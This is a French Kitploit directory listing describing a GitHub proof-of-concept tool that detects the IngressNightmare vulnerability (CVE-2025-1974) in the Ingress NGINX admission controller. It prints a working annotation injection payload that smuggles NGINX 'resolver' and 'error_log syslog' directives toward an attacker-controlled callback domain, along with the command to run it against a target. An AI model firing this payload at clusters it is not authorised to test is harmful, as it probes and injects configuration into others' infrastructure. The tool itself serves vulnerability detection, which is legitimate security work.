Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ingressnightmare-detection-poc — Outil de preuve de concept pour détecter IngressNightmare (CVE-2025-1974) via des moyens actifs (non intrusifs). | Kitploit
Outils/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
Scanners de VulnérabilitésExploitationSécurité WebTests d'IntrusionSécurité CloudMauvaise Configuration
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

Outil de preuve de concept pour détecter IngressNightmare (CVE-2025-1974) via des moyens actifs (non intrusifs).

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil de détection IngressNightmare

Présentation

Cet outil offre une capacité de détection non intrusive pour la chaîne de vulnérabilités IngressNightmare (CVE-2025-1974) affectant le contrôleur Ingress NGINX. Il exploite spécifiquement le vecteur d'injection d'annotation auth-url (CVE-2025-24514) pour vérifier la présence de cette vulnérabilité critique sans exécuter de code arbitraire.

Contexte technique

La chaîne de vulnérabilités IngressNightmare permet à un attaquant d'injecter des directives de configuration NGINX arbitraires via différents champs d'annotation Ingress. Lorsque ces ressources Ingress malveillantes sont traitées par le contrôleur d'admission, les directives injectées sont évaluées pendant la phase de validation de la configuration NGINX (nginx -t).

Cette preuve de concept exploite spécifiquement la vulnérabilité de l'annotation auth-url en injectant la directive error_log avec un serveur syslog pointant vers un domaine contrôlé par l'attaquant. Lors de la validation de la configuration, NGINX va :

  1. Analyser la configuration injectée
  2. Résoudre le domaine spécifié via DNS

Cette activité de résolution DNS fournit un signal fiable que la cible est vulnérable sans nécessiter d'exécution de code ni de perturbation de service.

Utilisation

  1. Mettez en place un écouteur de rappel DNS à l'aide de Burp Collaborator, interactsh ou tout service de surveillance DNS.

  2. Exécutez l'outil de détection :

    root@kitploit:~
    $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
    
  3. Si vulnérable, vous observerez des tentatives de résolution DNS vers votre domaine de rappel DNS :

poc

Méthodologie de détection

L'outil construit un objet AdmissionReview spécialement conçu contenant une ressource Ingress avec la charge utile d'injection suivante :

root@kitploit:~
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"

Cette charge utile :

  • Utilise le caractère de commentaire (#) pour terminer l'URL
  • Injecte un saut de ligne suivi d'une directive de résolveur
  • Ajoute la directive error_log avec syslog pointant vers le domaine de rappel DNS
  • Met le reste en commentaire pour maintenir la validité syntaxique

Lorsqu'il est traité par un contrôleur d'admission vulnérable, cela entraîne une recherche DNS sortante qui confirme la présence de la vulnérabilité.

Limitations

Cet outil ne détecte que la présence de la vulnérabilité et ne tente pas de l'exploiter pour exécuter du code arbitraire.

Crédits

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

Télécharger l’outil